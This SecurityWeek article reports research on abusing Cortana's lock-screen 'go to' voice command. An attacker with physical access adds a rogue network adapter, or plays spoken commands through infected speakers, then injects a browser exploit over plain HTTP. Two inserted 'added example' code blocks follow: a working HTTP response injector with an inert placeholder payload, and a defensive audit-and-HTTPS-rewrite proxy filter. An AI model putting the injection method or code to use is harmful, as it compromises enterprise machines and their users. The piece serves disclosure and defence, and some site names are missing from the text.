Cortana Can Expose Enterprises to Attacks, Researchers Warn

Malicious actors may be able to abuse voice-based virtual assistants to hack into enterprise systems and researchers proved it through an attack that targets Microsoft Cortana.
Independent researchers Amichai Shulman, former CTO and co-founder of Imperva, and Tal Be’ery, former VP of research at Microsoft-acquired security firm Aorato, have found a way to conduct an evil maid attack that abuses the Cortana voice assistant to install malware onto a locked computer. The researchers are detailing their findings on Friday at Kaspersky Lab’s Security Analyst Summit (SAS) in Cancun, Mexico.

In Windows 10, if default settings are not changed, any user can interact with Cortana by saying “Hey Cortana,” and this works even while the device is locked. Administrators can turn this off centrally with the “Allow Cortana above lock screen” Group Policy setting (Computer Configuration > Administrative Templates > Windows Components > Search); users can disable it per account in Cortana’s own settings.

Shulman and Be’ery explained that when the device is locked, the screen is locked and the keyboard cannot be used to control applications, but apps can still run in the background.

In an attack scenario they described, an evil maid (i.e. a hacker who has physical access to the targeted machine) can install malware on a locked device by telling Cortana to access a website, intercepting traffic to that site using a device attached to the PC, and injecting malicious code into the connection.

One of the voice commands accepted by Cortana from the lock screen is “go to [website domain].” If the user tells Cortana to access any site, Windows launches a browser process and sends a query for the domain name to Bing. In the case of “privileged” websites, such as, Windows would launch a browser process and navigate to the site directly. After being notified by the researchers of the potential for abuse, Microsoft has decided to make some changes and no longer allow direct browsing from a locked machine.

The first step in the attack scenario described by Shulman and Be’ery involves plugging a rogue USB network adapter or a network cable into the targeted machine, so that the attacker controls the path the PC’s traffic takes. The attacker then instructs Cortana to access a privileged website that does not use a secure HTTPS connection (e.g.

Since the connection is not protected, the hacker’s network card can be used to conduct a man-in-the-middle (MitM) attack and replace normal traffic with malicious code, such as a web browser exploit designed to deliver a piece of malware. The malware then provides a remote backdoor to the compromised system.
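The mechanics of that man-in-the-middle step, as an added example that is not the researchers’ code: once the lock-screen “go to” request lands on a plaintext HTTP site, whoever sits on the path (the rogue USB network adapter in the evil-maid case, or an ARP-poisoning host in the remote variant described further down) can rewrite the HTML before the browser renders it. The HTTP response and the TLS record bytes below are constructed for the example, and the injected payload is an inert marker standing in for the browser exploit the attack would really deliver.

```python
"""Added example (not the researchers' code): how an on-path attacker tampers
with a plaintext HTTP response.  Only the simple case the article describes is
handled: an un-chunked text/html response carrying a Content-Length header.
"""
import re

# Inert stand-in for the browser exploit a real attacker would inject.
MARKER = b"<script>/* attacker-controlled JavaScript would be placed here */</script>"


def build_response(body: bytes, content_type: bytes = b"text/html; charset=utf-8") -> bytes:
    """Constructed HTTP/1.1 response, as a plaintext site would send it."""
    return (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: " + content_type + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"Connection: close\r\n\r\n" + body
    )


def inject_into_response(raw: bytes, payload: bytes = MARKER):
    """Return the tampered response, or None if raw is not injectable HTML.

    TLS traffic never matches the header split below, which is exactly why
    the attack needs the target site to be reachable over plain HTTP.
    """
    sep = raw.find(b"\r\n\r\n")
    if sep < 0 or not raw.startswith(b"HTTP/1."):
        return None
    head, body = raw[:sep], raw[sep + 4:]
    headers = head.split(b"\r\n")
    lowered = [h.lower() for h in headers]
    if not any(h.startswith(b"content-type:") and b"text/html" in h for h in lowered):
        return None  # scripts in a JSON or image body would not execute
    if any(h.startswith(b"transfer-encoding:") for h in lowered):
        return None  # chunked bodies would need dechunking first; out of scope
    # Insert just before </body> so the page still renders normally for the victim.
    m = re.search(rb"</body>", body, re.IGNORECASE)
    new_body = body[:m.start()] + payload + body[m.start():] if m else body + payload
    # Fix the length header, or the browser truncates or hangs on the response.
    new_headers = []
    for h in headers:
        if h.lower().startswith(b"content-length:"):
            new_headers.append(b"Content-Length: " + str(len(new_body)).encode())
        else:
            new_headers.append(h)
    return b"\r\n".join(new_headers) + b"\r\n\r\n" + new_body


# Constructed sample traffic: "hello" stands in for a news front page.
SAMPLE_HTML = b"<html><head><title>news</title></head><body>hello</body></html>"
SAMPLE_RESPONSE = build_response(SAMPLE_HTML)
# Constructed leading bytes of a TLS record: opaque to the injector.
SAMPLE_TLS_RECORD = b"\x16\x03\x03\x00\x05\x01\x00\x00\x01\x00"


def demo():
    tampered = inject_into_response(SAMPLE_RESPONSE)
    print(tampered.decode())
    print("TLS record injectable:", inject_into_response(SAMPLE_TLS_RECORD) is not None)


if __name__ == "__main__":
    demo()
```

The Content-Length rewrite is the detail that is easy to miss: without it, a browser reading a `Connection: close` response would wait for or cut off the injected bytes. The same code applied to the HTTPS version of the site gets nothing to parse, which is the whole point of Microsoft’s change to stop direct browsing from the lock screen and of the HTTPS rewrite the researchers describe for their Newspeak tool.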

If the attacker already had access to a system, they could have conducted a remote attack where a piece of malware played an audio file that instructed Cortana to navigate to an arbitrary website. This could have been used to hack other devices on the targeted enterprise network.

“The attacker uses the infected computer speakers to send the Cortana commands as before (plays ‘Go to’). The attacker gets network access to the next victim computer (the equivalent of the network cable USB network card) through a known network attack (e.g. ARP poisoning) and replaces the content of with malicious content,” Be’ery told SecurityWeek.

Microsoft made some server-side changes in August 2017 in order to prevent abuse, but Shulman and Be’ery believe there could be other Cortana commands that can be leveraged for similar attacks, and noted that the research can be extended to other voice assistants, such as Apple’s Siri.

As part of their research, the experts also developed a tool, named Newspeak, that acts as a proxy for communications between Cortana and Microsoft servers.

“The Newspeak tool enables its user to monitor Cortana requests (user says ‘go to’ and Cortana cloud sends that interpreted text back) and results (Cortana cloud commands the Cortana client to perform the action of ‘browse to’) and therefore create an audit log of Cortana. It can be used to detect malicious and abnormal usage and block/alert,” Be’ery explained.

“Another use of the Newspeak tool can be to alter the commands for fun/malicious purposes (user request cnn, let’s give him fox news), or for defensive use cases (instead of going to the HTTP version of CNN go to the HTTPS version),” he added.
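A policy filter in the spirit of the defensive use cases Be’ery describes, as an added example that is not the Newspeak tool itself: it sits where an intercepting proxy would, sees the text the cloud interpreted from the microphone and the action it sends back, writes an audit record, and either allows the action, rewrites an HTTP target to HTTPS, or blocks a target that a locked device should not be sent to. The JSON shape of the cloud messages, the allowlist, and the sample session are all assumptions constructed for the example; the real Cortana protocol is not documented on the page.

```python
"""Added example (not the researchers' Newspeak tool): audit-and-filter logic
for Cortana actions seen by an intercepting proxy.  The message format is an
assumption made for the example.
"""
import json
from dataclasses import dataclass
from urllib.parse import urlsplit, urlunsplit

# Assumed allowlist: hosts a locked device may be sent to; anything else is blocked.
ALLOWED_HOSTS = {"www.cnn.com", "www.bing.com"}


@dataclass
class AuditRecord:
    heard: str      # text the cloud interpreted from the microphone
    action: str     # action the cloud asked the client to perform
    url: str        # URL as received from the cloud
    verdict: str    # "allow", "rewrite" or "block"
    final_url: str  # URL actually handed to the client ("" when blocked)


def upgrade_to_https(url: str) -> str:
    """Rewrite an http:// URL to https:// and leave everything else untouched."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "http":
        return url
    return urlunsplit(("https", parts.netloc, parts.path, parts.query, parts.fragment))


def decide(heard: str, cloud_action: dict, device_locked: bool) -> AuditRecord:
    """Apply policy to one cloud reply and return the audit record for it."""
    action = cloud_action.get("action", "")
    url = cloud_action.get("url", "")
    if action != "browse":
        # Non-navigation actions (speech, reminders) are logged but not filtered here.
        return AuditRecord(heard, action, url, "allow", url)
    host = (urlsplit(url).hostname or "").lower()
    if device_locked and host not in ALLOWED_HOSTS:
        return AuditRecord(heard, action, url, "block", "")
    final = upgrade_to_https(url)
    verdict = "rewrite" if final != url else "allow"
    return AuditRecord(heard, action, url, verdict, final)


def filter_session(messages, device_locked=True):
    """Run (heard_text, cloud_reply_json) pairs through policy; return the audit log."""
    return [decide(heard, json.loads(reply), device_locked) for heard, reply in messages]


# Constructed sample session: what the proxy would see during the attack.
SAMPLE_SESSION = [
    ("go to cnn", '{"action": "browse", "url": "http://www.cnn.com/"}'),
    ("go to attacker example", '{"action": "browse", "url": "http://attacker.example/"}'),
    ("what time is it", '{"action": "speak", "text": "It is noon"}'),
]


if __name__ == "__main__":
    for rec in filter_session(SAMPLE_SESSION):
        print(f"{rec.verdict:7} heard={rec.heard!r} -> {rec.final_url or '(blocked)'}")
```

The audit log alone gives defenders what the page says Newspeak provides: a record of what was heard and what the cloud told the client to do, which is the only place a “go to” spoken by a malware-played audio file shows up. The rewrite step removes the plaintext leg the man-in-the-middle needs, and the allowlist closes the arbitrary-domain case that Microsoft’s server-side change addressed.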

The researchers told SecurityWeek that they will make the Newspeak tool available at some point.

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
